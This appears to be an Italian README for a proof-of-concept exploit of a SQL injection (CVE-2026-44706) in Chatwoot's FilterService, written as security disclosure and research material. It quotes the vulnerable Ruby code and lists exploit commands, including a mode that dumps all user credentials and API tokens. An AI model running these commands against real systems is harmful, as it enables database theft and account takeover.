
SQL injection in FilterService di Chatwoot
Una proof-of-concept per CVE-2026-44706, una vulnerabilità di SQL Injection nel FilterService#lt_gt_filter_values di Chatwoot che permette a qualsiasi agente autenticato di leggere l'intero database PostgreSQL, incluse le credenziali utente e i token API. Leggi l'articolo completo qui.
Utilizzo:
# Verifica dell'iniezione (basata su booleani)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# Conferma basata sul tempo
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# Estrazione del risultato di una query SQL arbitraria
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# Scarica tutte le credenziali utente e i token API
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
In app/services/filter_service.rb (riga 91), l'input utente viene interpolato direttamente nel SQL senza parametrizzazione:
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← input utente, nessuna sanitizzazione
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← interpolazione grezza
end
Ogni altro operatore nella classe utilizza parametri bind (:value_N). Solo is_greater_than e is_less_than sono vulnerabili.
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filterCWE-89 SQL Injection. Qualsiasi agente/amministratore autenticato può:
pg_sleep() per esaurire le connessioni al database8.8 Alto CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Questo strumento è destinato esclusivamente a scopi educativi e di ricerca. Utilizzalo solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione a testare. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo programma.
QuimeraX Intelligence è una piattaforma avanzata di EASM e Cyber Threat Intelligence specializzata nell'identificazione di vulnerabilità critiche in sistemi complessi. La piattaforma monitora, rileva e avvisa proattivamente i clienti sulle minacce alla sicurezza, garantendo trasparenza e una risposta rapida ai potenziali rischi. I clienti ricevono notifiche immediate e report completi se i loro sistemi risultano vulnerabili, consentendo loro di adottare azioni protettive. scopri di più
Hakai Security è un'azienda di cybersecurity fondata da professionisti della sicurezza, impegnata nell'eccellenza tecnica. Offriamo soluzioni di sicurezza su misura, tra cui penetration test avanzati, simulazioni realistiche di Red Team e pratiche di sviluppo sicuro per proteggere proattivamente gli asset dei nostri clienti dalle minacce informatiche in evoluzione.
Hacking Club è la piattaforma di formazione dove impari la cybersecurity attraverso lezioni pratiche, laboratori e sfide create da esperti che lavorano nella nostra società di consulenza sulla sicurezza: direttamente dal campo di battaglia alla tua formazione. Metti in pratica la vulnerabilità presentata in questo repository con hacking club! scopri di più